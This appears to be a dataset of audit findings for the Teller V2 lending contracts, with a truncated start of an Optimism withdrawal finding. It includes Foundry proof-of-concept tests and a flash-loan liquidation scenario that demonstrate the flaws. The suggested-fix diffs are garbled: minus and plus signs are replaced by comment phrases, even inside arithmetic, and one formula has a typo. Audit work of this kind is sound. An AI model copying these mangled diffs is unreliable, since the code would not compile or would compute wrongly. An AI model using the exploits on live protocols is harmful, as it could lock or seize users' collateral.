`withdraw` of collateral will fail since the collateral is no longer there.ч```\\nFile: CollateralManager.sol\\n\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); // sends collateral to lender\\n emit CollateralClaimed(_bidId);\\n } else {\\n```\\n -bids can be created against markets that doesn't existчmediumчBids can be created against markets that does not yet exist. When this market is created, the bid can be accepted but neither defaulted/liquidated nor repaid.\\nThere's no verification that the market actually exists when submitting a bid. Hence a user could submit a bid for a non existing market.\\nFor it to not revert it must have 0% APY and the bid cannot be accepted until a market exists.\\nHowever, when this market is created the bid can be accepted. Then the loan would be impossible to default/liquidate:\\n```\\nFile: TellerV2.sol\\n\\n if (bidDefaultDuration[_bidId] == 0) return false;\\n```\\n\\nSince `bidDefaultDuration[_bidId]` will be `0`\\nAny attempt to repay will revert due to division by 0:\\n```\\nFile: libraries/V2Calculations.sol\\n\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle; \\n```\\n\\nSince `_bid.terms.paymentCycle` will also be `0` (and it will always end up in this branch since `PaymentType` will be EMI (0)).\\nHence the loan can never be closed.\\nPoC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport { UpgradeableBeacon } from \"@openzeppelin/contracts/proxy/beacon/UpgradeableBeacon.sol\";\\n\\nimport { TellerV2 } from \"../contracts/TellerV2.sol\";\\nimport { CollateralManager } from \"../contracts/CollateralManager.sol\";\\nimport { LenderCommitmentForwarder } from \"../contracts/LenderCommitmentForwarder.sol\";\\nimport { CollateralEscrowV1 } from \"../contracts/escrow/CollateralEscrowV1.sol\";\\nimport { MarketRegistry } from \"../contracts/MarketRegistry.sol\";\\n\\nimport { ReputationManagerMock } from \"../contracts/mock/ReputationManagerMock.sol\";\\nimport { LenderManagerMock } from \"../contracts/mock/LenderManagerMock.sol\";\\nimport { TellerASMock } from \"../contracts/mock/TellerASMock.sol\";\\n\\nimport {TestERC20Token} from \"./tokens/TestERC20Token.sol\";\\n\\nimport \"lib/forge-std/src/Test.sol\";\\nimport \"lib/forge-std/src/StdAssertions.sol\";\\n\\ncontract LoansTest is Test {\\n MarketRegistry marketRegistry;\\n TellerV2 tellerV2;\\n \\n TestERC20Token principalToken;\\n\\n address alice = address(0x1111);\\n address bob = address(0x2222);\\n address owner = address(0x3333);\\n\\n function setUp() public {\\n tellerV2 = new TellerV2(address(0));\\n\\n marketRegistry = new MarketRegistry();\\n TellerASMock tellerAs = new TellerASMock();\\n marketRegistry.initialize(tellerAs);\\n\\n LenderCommitmentForwarder lenderCommitmentForwarder = \\n new LenderCommitmentForwarder(address(tellerV2),address(marketRegistry));\\n CollateralManager collateralManager = new CollateralManager();\\n collateralManager.initialize(address(new UpgradeableBeacon(address(new CollateralEscrowV1()))),\\n address(tellerV2));\\n address rm = address(new ReputationManagerMock());\\n address lm = address(new LenderManagerMock());\\n tellerV2.initialize(0, address(marketRegistry), rm, address(lenderCommitmentForwarder),\\n address(collateralManager), lm);\\n\\n principalToken = new TestERC20Token(\"Principal Token\", \"PRIN\", 12e18, 18);\\n }\\n\\n function testSubmitBidForNonExistingMarket() public {\\n uint256 amount = 12e18;\\n principalToken.transfer(bob,amount);\\n\\n vm.prank(bob);\\n principalToken.approve(address(tellerV2),amount);\\n\\n // alice places bid on non-existing market\\n vm.prank(alice);\\n uint256 bidId = tellerV2.submitBid(\\n address(principalToken),\\n 1, // non-existing right now\\n amount,\\n 360 days,\\n 0, // any APY != 0 will cause revert on div by 0\\n \"\",\\n alice\\n );\\n\\n // bid cannot be accepted before market\\n vm.expectRevert(); // div by 0\\n vm.prank(bob);\\n tellerV2.lenderAcceptBid(bidId);\\n\\n vm.startPrank(owner);\\n uint256 marketId = marketRegistry.createMarket(\\n owner,\\n 30 days,\\n 30 days,\\n 1 days,\\n 0,\\n false,\\n false,\\n \"\"\\n );\\n marketRegistry.setMarketFeeRecipient(marketId, owner);\\n vm.stopPrank();\\n\\n // lender takes bid\\n vm.prank(bob);\\n tellerV2.lenderAcceptBid(bidId);\\n\\n // should be liquidatable now\\n vm.warp(32 days);\\n\\n // loan cannot be defaulted/liquidated\\n assertFalse(tellerV2.isLoanDefaulted(bidId));\\n assertFalse(tellerV2.isLoanLiquidateable(bidId));\\n\\n vm.startPrank(alice);\\n principalToken.approve(address(tellerV2),12e18);\\n\\n // and loan cannot be repaid\\n vm.expectRevert(); // division by 0\\n tellerV2.repayLoanFull(bidId);\\n vm.stopPrank();\\n }\\n}\\n```\\nчWhen submitting a bid, verify that the market exists.чThis will lock any collateral forever since there's no way to retrieve it. For this to happen accidentally a borrower would have to create a bid for a non existing market with 0% APY though.\\nThis could also be used to lure lenders since the loan cannot be liquidated/defaulted. This might be difficult since the APY must be 0% for the bid to be created. Also, this will lock any collateral provided by the borrower forever.\\nDue to these circumstances I'm categorizing this as medium.ч```\\nFile: TellerV2.sol\\n\\n if (bidDefaultDuration[_bidId] == 0) return false;\\n```\\n -last repayments are calculated incorrectly for \"irregular\" loan durationsчmediumчWhen taking a loan, a borrower expects that at the end of each payment cycle they should pay `paymentCycleAmount`. This is not true for loans that are not a multiple of `paymentCycle`.\\nImagine a loan of `1000` that is taken for 2.5 payment cycles (skip interest to keep calculations simple).\\nA borrower would expect to pay `400` + `400` + `200`\\nThis holds true for the first installment.\\nBut lets look at what happens at the second installment, here's the calculation of what is to pay in V2Calculations.sol:\\n```\\nFile: libraries/V2Calculations.sol\\n\\n 93: // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n 94: int256 durationLeftOnLoan = int256(\\n 95: uint256(_bid.loanDetails.loanDuration)\\n 96: ) -\\n 97: (int256(_timestamp) -\\n 98: int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n 99: bool isLastPaymentCycle = durationLeftOnLoan <\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n owedPrincipal_ + interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n```\\n\\nSimplified the first calculation says `timeleft = loanDuration - (now - acceptedTimestamp)` and then if `timeleft < paymentCycle` we are within the last payment cycle.\\nThis isn't true for loan durations that aren't multiples of the payment cycles. This code says the last payment cycle is when you are one payment cycle from the end of the loan. Which is not the same as last payment cycle as my example above shows.\\nPoC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport { UpgradeableBeacon } from \"@openzeppelin/contracts/proxy/beacon/UpgradeableBeacon.sol\";\\n\\nimport { AddressUpgradeable } from \"@openzeppelin/contracts-upgradeable/utils/AddressUpgradeable.sol\";\\n\\nimport { TellerV2 } from \"../contracts/TellerV2.sol\";\\nimport { Payment } from \"../contracts/TellerV2Storage.sol\";\\nimport { CollateralManager } from \"../contracts/CollateralManager.sol\";\\nimport { LenderCommitmentForwarder } from \"../contracts/LenderCommitmentForwarder.sol\";\\nimport { CollateralEscrowV1 } from \"../contracts/escrow/CollateralEscrowV1.sol\";\\nimport { Collateral, CollateralType } from \"../contracts/interfaces/escrow/ICollateralEscrowV1.sol\";\\n\\nimport { ReputationManagerMock } from \"../contracts/mock/ReputationManagerMock.sol\";\\nimport { LenderManagerMock } from \"../contracts/mock/LenderManagerMock.sol\";\\nimport { MarketRegistryMock } from \"../contracts/mock/MarketRegistryMock.sol\";\\n\\nimport {TestERC20Token} from \"./tokens/TestERC20Token.sol\";\\n\\nimport \"lib/forge-std/src/Test.sol\";\\n\\ncontract LoansTest is Test {\\n using AddressUpgradeable for address;\\n\\n MarketRegistryMock marketRegistry;\\n\\n TellerV2 tellerV2;\\n LenderCommitmentForwarder lenderCommitmentForwarder;\\n CollateralManager collateralManager;\\n \\n TestERC20Token principalToken;\\n\\n address alice = address(0x1111);\\n\\n uint256 marketId = 0;\\n\\n function setUp() public {\\n tellerV2 = new TellerV2(address(0));\\n\\n marketRegistry = new MarketRegistryMock();\\n\\n lenderCommitmentForwarder = new LenderCommitmentForwarder(address(tellerV2),address(marketRegistry));\\n \\n collateralManager = new CollateralManager();\\n collateralManager.initialize(address(new UpgradeableBeacon(address(new CollateralEscrowV1()))), address(tellerV2));\\n\\n address rm = address(new ReputationManagerMock());\\n address lm = address(new LenderManagerMock());\\n tellerV2.initialize(0, address(marketRegistry), rm, address(lenderCommitmentForwarder), address(collateralManager), lm);\\n\\n marketRegistry.setMarketOwner(address(this));\\n marketRegistry.setMarketFeeRecipient(address(this));\\n\\n tellerV2.setTrustedMarketForwarder(marketId,address(lenderCommitmentForwarder));\\n\\n principalToken = new TestERC20Token(\"Principal Token\", \"PRIN\", 12e18, 18);\\n }\\n\\n\\n function testLoanInstallmentsCalculatedIncorrectly() public {\\n // payment cycle is 1000 in market registry\\n \\n uint256 amount = 1000;\\n principalToken.transfer(alice,amount);\\n \\n vm.startPrank(alice);\\n principalToken.approve(address(tellerV2),2*amount);\\n uint256 bidId = tellerV2.submitBid(\\n address(principalToken),\\n marketId,\\n amount,\\n 2500, // 2.5 payment cycles\\n 0, // 0 interest to make calculations easier\\n \"\",\\n alice\\n );\\n tellerV2.lenderAcceptBid(bidId);\\n vm.stopPrank();\\n\\n // jump to first payment cycle end\\n vm.warp(block.timestamp + 1000);\\n Payment memory p = tellerV2.calculateAmountDue(bidId);\\n assertEq(400,p.principal);\\n\\n // borrower pays on time\\n vm.prank(alice);\\n tellerV2.repayLoanMinimum(bidId);\\n\\n // jump to second payment cycle\\n vm.warp(block.timestamp + 1000);\\n p = tellerV2.calculateAmountDue(bidId);\\n\\n // should be 400 but is full loan\\n assertEq(600,p.principal);\\n }\\n}\\n```\\n\\nThe details of this finding are out of scope but since it makes `TellerV2`, in scope, behave unexpectedly I believe this finding to be in scope.чFirst I thought that you could remove the `lastPaymentCycle` calculation all together. I tried that and then also tested what happened with \"irregular\" loans with interest.\\nThen I found this in the EMI calculation:\\n```\\nFile: libraries/NumbersLib.sol\\n\\n uint256 n = Math.ceilDiv(loanDuration, cycleDuration);\\n```\\n\\nEMI, which is designed for mortgages, assumes the payments is a discrete number of the same amortization essentially. I.e they don't allow \"partial\" periods at the end, because that doesn't make sense for a mortgage.\\nIn Teller this is allowed which causes some issues with the EMI calculation since the above row will always round up to a full number of payment periods. If you also count interest, which triggers the EMI calculation: The lender, in an \"irregular\" loan duration, would get less per installment up to the last one which would be bigger. The funds would all be paid with the correct interest in the end just not in the expected amounts.\\nMy recommendation now is:\\neither\\ndon't allow loan durations that aren't a multiple of the period, at least warn about it UI-wise, no one will lose any money but the installments might be split in unexpected amounts.\\nDo away with EMI all together as DeFi loans aren't the same as mortgages. The defaulting/liquidation logic only cares about time since last payment.\\nDo more math to make EMI work with irregular loan durations. This nerd sniped me:\\nMore math:\\nIn the middle we have an equation which describes the owed amount at a time $P_n$:\\n$$P_n=Pt^n-E\\frac{(t^n-1)}{t-n}$$ where $t=1+r$ and $r$ is the monthly interest rate ($apy*C/year$).\\nNow, from here, we want to calculate the loan at a time $P_{n + \\Delta}$:\\n$$P_{n + \\Delta}=Pt^nt_\\Delta-E\\frac{t^n-1}{t-1}t_\\Delta-kE$$\\nWhere $k$ is $c/C$ i.e. the ratio of partial cycle compared to a full cycle.\\nSame with $t_\\Delta$ which is $1+r_\\Delta$, ($r_\\Delta$ is also equal to $kr$, ratio of partial cycle rate to full cycle rate, which we'll use later).\\nReorganize to get $E$ from above:\\n$$ E = P r \\frac{t^nt_\\Delta}{t_\\Delta \\frac{t^n-1}{t-1} + k} $$\\nNow substitute in $1+r$ in place of $t$ and $1+r_\\Delta$ instead of $t_\\Delta$ and multiply both numerator and denominator with $r$:\\n$$ E = P \\frac{r (1+r)^n(1+r_\\Delta)}{(1+r_\\Delta)((1+r)^n - 1) + kr} $$\\nand $kr = r_\\Delta$ gives us:\\n$$ E = P r (1+r)^n \\frac{(1+r_\\Delta)}{(1+r_\\Delta)((1+r)^n - 1) + r_\\Delta} $$\\nTo check that this is correct, $r_\\Delta = 0$ (no extra cycle added) should give us the regular EMI equation. Which we can see is true for the above. And $r_\\Delta = r$ (a full extra cycle added) should give us the EMI equation but with $n+1$ which we can also see it does.\\nHere are the code changes to use this, together with changes to `V2Calculations.sol` to calculate the last period correctly:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\nindex 1cce8da..1ad5bcf 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\n@@ // Remove the line below\\n90,30 // Add the line below\\n90,15 @@ library V2Calculations {\\n uint256 owedTime = _timestamp // Remove the line below\\n uint256(_lastRepaidTimestamp);\\n interest_ = (interestOwedInAYear * owedTime) / daysInYear;\\n \\n// Remove the line below\\n // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n// Remove the line below\\n int256 durationLeftOnLoan = int256(\\n// Remove the line below\\n uint256(_bid.loanDetails.loanDuration)\\n// Remove the line below\\n ) // Remove the line below\\n\\n// Remove the line below\\n (int256(_timestamp) // Remove the line below\\n\\n// Remove the line below\\n int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n// Remove the line below\\n bool isLastPaymentCycle = durationLeftOnLoan <\\n// Remove the line below\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n// Remove the line below\\n owedPrincipal_ // Add the line below\\n interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n// Remove the line below\\n\\n if (_bid.paymentType == PaymentType.Bullet) {\\n// Remove the line below\\n if (isLastPaymentCycle) {\\n// Remove the line below\\n duePrincipal_ = owedPrincipal_;\\n// Remove the line below\\n }\\n// Add the line below\\n duePrincipal_ = owedPrincipal_;\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n// Remove the line below\\n uint256 maxCycleOwed = isLastPaymentCycle\\n// Remove the line below\\n ? owedPrincipal_ // Add the line below\\n interest_\\n// Remove the line below\\n : _bid.terms.paymentCycleAmount;\\n \\n // Calculate accrued amount due since last repayment\\n// Remove the line below\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n// Add the line below\\n uint256 owedAmount = (_bid.terms.paymentCycleAmount * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount // Remove the line below\\n interest_, owedPrincipal_);\\n }\\n```\\n\\nAnd then NumbersLib.sol:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\nindex f34dd9c..8ca48bc 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\n@@ // Remove the line below\\n120,7 // Add the line below\\n120,8 @@ library NumbersLib {\\n );\\n \\n // Number of payment cycles for the duration of the loan\\n// Remove the line below\\n uint256 n = Math.ceilDiv(loanDuration, cycleDuration);\\n// Add the line below\\n uint256 n = loanDuration/ cycleDuration;\\n// Add the line below\\n uint256 rest = loanDuration%cycleDuration;\\n \\n uint256 one = WadRayMath.wad();\\n uint256 r = WadRayMath.pctToWad(apr).wadMul(cycleDuration).wadDiv(\\n@@ // Remove the line below\\n128,8 // Add the line below\\n129,16 @@ library NumbersLib {\\n );\\n uint256 exp = (one // Add the line below\\n r).wadPow(n);\\n uint256 numerator = principal.wadMul(r).wadMul(exp);\\n// Remove the line below\\n uint256 denominator = exp // Remove the line below\\n one;\\n \\n// Remove the line below\\n return numerator.wadDiv(denominator);\\n// Add the line below\\n if(rest==0) {\\n// Add the line below\\n // duration is multiple of cycle\\n// Add the line below\\n uint256 denominator = exp // Remove the line below\\n one;\\n// Add the line below\\n return numerator.wadDiv(denominator);\\n// Add the line below\\n }\\n// Add the line below\\n // duration is an uneven cycle\\n// Add the line below\\n uint256 rDelta = WadRayMath.pctToWad(apr).wadMul(rest).wadDiv(daysInYear);\\n// Add the line below\\n uint256 n1 = numerator.wadMul(one // Add the line below\\n rDelta);\\n// Add the line below\\n uint256 denom = ((one // Add the line below\\n rDelta).wadMul(exp // Remove the line below\\n one)) // Add the line below\\n rDelta;\\n// Add the line below\\n return n1.wadDiv(denom);\\n }\\n }\\n```\\nчA borrower taking a loan might not be able to pay the last payment cycle and be liquidated. At the worst possible time since they've paid the whole loan on schedule up to the last installment. The liquidator just need to pay the last installment to take the whole collateral.\\nThis requires the loan to not be a multiple of the payment cycle which might sound odd. But since a year is 365 days and a common payment cycle is 30 days I imagine there can be quite a lot of loans that after 360 days will end up in this issue.\\nThere is also nothing stopping an unknowing borrower from placing a bid or accepting a commitment with an odd duration.ч```\\nFile: libraries/V2Calculations.sol\\n\\n 93: // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n 94: int256 durationLeftOnLoan = int256(\\n 95: uint256(_bid.loanDetails.loanDuration)\\n 96: ) -\\n 97: (int256(_timestamp) -\\n 98: int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n 99: bool isLastPaymentCycle = durationLeftOnLoan <\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n owedPrincipal_ + interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n```\\n -setLenderManager may cause some Lenders to lose their assetsчmediumчIf the contract's lenderManager changes, repaid assets will be sent to the old lenderManager\\nsetLenderManager is used to change the lenderManager address of the contract\\n```\\n function setLenderManager(address _lenderManager)\\n external\\n reinitializer(8)\\n onlyOwner\\n {\\n _setLenderManager(_lenderManager);\\n }\\n\\n function _setLenderManager(address _lenderManager)\\n internal\\n onlyInitializing\\n {\\n require(\\n _lenderManager.isContract(),\\n \"LenderManager must be a contract\"\\n );\\n lenderManager = ILenderManager(_lenderManager);\\n }\\n```\\n\\nclaimLoanNFT will change the bid.lender to the current lenderManager\\n```\\n function claimLoanNFT(uint256 _bidId)\\n external\\n acceptedLoan(_bidId, \"claimLoanNFT\")\\n whenNotPaused\\n {\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n require(sender == bid.lender, \"only lender can claim NFT\");\\n // mint an NFT with the lender manager\\n lenderManager.registerLoan(_bidId, sender);\\n // set lender address to the lender manager so we know to check the owner of the NFT for the true lender\\n bid.lender = address(lenderManager);\\n }\\n```\\n\\nIn getLoanLender, if the bid.lender is the current lenderManager, the owner of the NFT will be returned as the lender, and the repaid assets will be sent to the lender.\\n```\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n if (lender_ == address(lenderManager)) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n// rest of code\\n address lender = getLoanLender(_bidId);\\n\\n // Send payment to the lender\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n```\\n\\nIf setLenderManager is called to change the lenderManager, in getLoanLender, since the bid.lender is not the current lenderManager, the old lenderManager address will be returned as the lender, and the repaid assets will be sent to the old lenderManager, resulting in the loss of the lender's assetsчConsider using MAGIC_NUMBER as bid.lender in claimLoanNFT and using that MAGIC_NUMBER in getLoanLender to do the comparison.\\n```\\n// Add the line below\\n address MAGIC_NUMBER = 0x// rest of code;\\n function claimLoanNFT(uint256 _bidId)\\n external\\n acceptedLoan(_bidId, \"claimLoanNFT\")\\n whenNotPaused\\n {\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n require(sender == bid.lender, \"only lender can claim NFT\");\\n // mint an NFT with the lender manager\\n lenderManager.registerLoan(_bidId, sender);\\n // set lender address to the lender manager so we know to check the owner of the NFT for the true lender\\n// Remove the line below\\n bid.lender = address(lenderManager);\\n// Add the line below\\n bid.lender = MAGIC_NUMBER;\\n }\\n// rest of code\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n// Remove the line below\\n if (lender_ == address(lenderManager)) {\\n// Add the line below\\n if (lender_ == MAGIC_NUMBER) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n```\\nчIt may cause some Lenders to lose their assetsч```\\n function setLenderManager(address _lenderManager)\\n external\\n reinitializer(8)\\n onlyOwner\\n {\\n _setLenderManager(_lenderManager);\\n }\\n\\n function _setLenderManager(address _lenderManager)\\n internal\\n onlyInitializing\\n {\\n require(\\n _lenderManager.isContract(),\\n \"LenderManager must be a contract\"\\n );\\n lenderManager = ILenderManager(_lenderManager);\\n }\\n```\\n -A borrower/lender or liquidator will fail to withdraw the collateral assets due to reaching a gas limitчmediumчWithin the TellerV2#submitBid(), there is no limitation that how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.\\nThis lead to some bad scenarios like this due to reaching gas limit:\\nA borrower or a lender fail to withdraw the collateral assets when the loan would not be liquidated.\\nA liquidator will fail to withdraw the collateral assets when the loan would be liquidated.\\n```\\nstruct Collateral {\\n CollateralType _collateralType;\\n uint256 _amount;\\n uint256 _tokenId;\\n address _collateralAddress;\\n}\\n```\\n\\n```\\n /**\\n * Since collateralInfo is mapped (address assetAddress => Collateral) that means\\n * that only a single tokenId per nft per loan can be collateralized.\\n * Ex. Two bored apes cannot be used as collateral for a single loan.\\n */\\n struct CollateralInfo {\\n EnumerableSetUpgradeable.AddressSet collateralAddresses;\\n mapping(address => Collateral) collateralInfo;\\n }\\n```\\n\\n```\\n // bidIds -> validated collateral info\\n mapping(uint256 => CollateralInfo) internal _bidCollaterals;\\n```\\n\\n```\\n function submitBid(\\n address _lendingToken,\\n uint256 _marketplaceId,\\n uint256 _principal,\\n uint32 _duration,\\n uint16 _APR,\\n string calldata _metadataURI,\\n address _receiver,\\n Collateral[] calldata _collateralInfo /// @audit\\n ) public override whenNotPaused returns (uint256 bidId_) {\\n // rest of code\\n bool validation = collateralManager.commitCollateral(\\n bidId_,\\n _collateralInfo /// @audit \\n );\\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Checks the validity of a borrower's multiple collateral balances and commits it to a bid.\\n * @param _bidId The id of the associated bid.\\n * @param _collateralInfo Additional information about the collateral assets.\\n * @return validation_ Boolean indicating if the collateral balances were validated.\\n */\\n function commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo /// @audit\\n ) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo);\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) { \\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info); /// @audit\\n }\\n }\\n }\\n```\\n\\n```\\n /**\\n * @notice Checks the validity of a borrower's collateral balance and commits it to a bid.\\n * @param _bidId The id of the associated bid.\\n * @param _collateralInfo Additional information about the collateral asset.\\n */\\n function _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n ) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; /// @audit\\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId)); /// @audit \\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); /// @audit \\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Sends the deposited collateral to a liquidator of a bid.\\n * @notice Can only be called by the protocol.\\n * @param _bidId The id of the liquidated bid.\\n * @param _liquidatorAddress The address of the liquidator to send the collateral to.\\n */\\n function liquidateCollateral(uint256 _bidId, address _liquidatorAddress)\\n external\\n onlyTellerV2\\n {\\n if (isBidCollateralBacked(_bidId)) {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n require(\\n bidState == BidState.LIQUIDATED,\\n \"Loan has not been liquidated\"\\n );\\n _withdraw(_bidId, _liquidatorAddress); /// @audit\\n }\\n }\\n```\\n\\n```\\n /**\\n * @notice Withdraws collateral to a given receiver's address.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n * @param _receiver The address to withdraw the collateral to.\\n */\\n function _withdraw(uint256 _bidId, address _receiver) internal virtual {\\n for (\\n uint256 i;\\n i < _bidCollaterals[_bidId].collateralAddresses.length(); /// @audit\\n i++\\n ) {\\n // Get collateral info\\n Collateral storage collateralInfo = _bidCollaterals[_bidId]\\n .collateralInfo[\\n _bidCollaterals[_bidId].collateralAddresses.at(i)\\n ];\\n // Withdraw collateral from escrow and send it to bid lender\\n ICollateralEscrowV1(_escrows[_bidId]).withdraw( /// @audit\\n collateralInfo._collateralAddress,\\n collateralInfo._amount,\\n _receiver\\n );\\n```\\n\\nHowever, within the TellerV2#submitBid(), there is no limitation that how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.\\nThis lead to a bad scenario like below:\\n① A borrower assign too many number of the collateral assets (ERC20/ERC721/ERC1155) into the `_collateralInfo` array parameter when the borrower call the TellerV2#submitBid() to submit a bid.\\n② Then, a lender accepts the bid via calling the TellerV2#lenderAcceptBid()\\n③ Then, a borrower or a lender try to withdraw the collateral, which is not liquidated, by calling the CollateralManager#withdraw(). Or, a liquidator try to withdraw the collateral, which is liquidated, by calling the CollateralManager#liquidateCollateral()\\n④ But, the transaction of the CollateralManager#withdraw() or the CollateralManager#liquidateCollateral() will be reverted in the for-loop of the CollateralManager#_withdraw() because that transaction will reach a gas limit.чWithin the TellerV2#submitBid(), consider adding a limitation about how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.чDue to reaching gas limit, some bad scenarios would occur like this:\\nA borrower or a lender fail to withdraw the collateral assets when the loan would not be liquidated.\\nA liquidator will fail to withdraw the collateral assets when the loan would be liquidated.ч```\\nstruct Collateral {\\n CollateralType _collateralType;\\n uint256 _amount;\\n uint256 _tokenId;\\n address _collateralAddress;\\n}\\n```\\n -Premature Liquidation When a Borrower Pays earlyчmediumчOn TellerV2 markets, whenever a borrower pays early in one payment cycle, they could be at risk to be liquidated in the next payment cycle. And this is due to a vulnerability in the liquidation logic implemented in `_canLiquidateLoan`. Note: This issue is submitted separately from issue #2 because the exploit is based on user behaviors regardless of a specific market setting. And the vulnerability might warrant a change in the liquidation logic.\\nIn TellerV2.sol, the sole liquidation logic is dependent on the time gap between now and the previous payment timestamp. But a user might decide to pay at any time within a given payment cycle, which makes the time gap unreliable and effectively renders this logic vulnerable to exploitation.\\n```\\n return (uint32(block.timestamp) -\\n _liquidationDelay -\\n lastRepaidTimestamp(_bidId) >\\n bidDefaultDuration[_bidId]);\\n```\\n\\nSuppose a scenario where a user takes on a loan on a market with 3 days payment cycle and 3 days paymentDefaultDuration. And the loan is 14 days in duration. The user decided to make the first minimal payment an hour after receiving the loan, and the next payment due date is after the sixth day. Now 5 days passed since the user made the first payment, and a liquidator comes in and liquidates the loan and claims the collateral before the second payment is due.\\nHere is a test to show proof of concept for this scenario.чConsider using the current timestamp - previous payment due date instead of just `lastRepaidTimestamp` in the liquidation check logic. Also, add the check to see whether a user is late on a payment in `_canLiquidateLoan`.чGiven the fact that this vulnerability is not market specific and that users can pay freely during a payment cycle, it's quite easy for a liquidator to liquidate loans prematurely. And the effect might be across multiple markets.\\nWhen there are proportional collaterals, the exploit can be low cost. An attacker could take on flash loans to pay off the principal and interest, and the interest could be low when early in the loan duration. The attacker would then sell the collateral received in the same transaction to pay off flash loans and walk away with profits.ч```\\n return (uint32(block.timestamp) -\\n _liquidationDelay -\\n lastRepaidTimestamp(_bidId) >\\n bidDefaultDuration[_bidId]);\\n```\\n -All migrated withdrarwals that require more than 135,175 gas may be brickedчhighчMigrated withdrawals are given an \"outer\" (Portal) gas limit of `calldata cost + 200,000`, and an \"inner\" (CrossDomainMessenger) gas limit of `0`. The assumption is that the CrossDomainMessenger is replayable, so there is no need to specify a correct gas limit.\\nThis is an incorect assumption. For any withdrawals that require more than 135,175 gas, insufficient gas can be sent such that CrossDomainMessenger's external call reverts and the remaining 1/64th of the gas sent is not enough for replayability to be encoded in the Cross Domain Messenger.\\nHowever, the remaining 1/64th of gas in the Portal is sufficient to have the transaction finalize, so that the Portal will not process the withdrawal again.\\nWhen old withdrawals are migrated to Bedrock, they are encoded as calls to `L1CrossDomainMessenger.relayMessage()` as follows:\\n```\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := 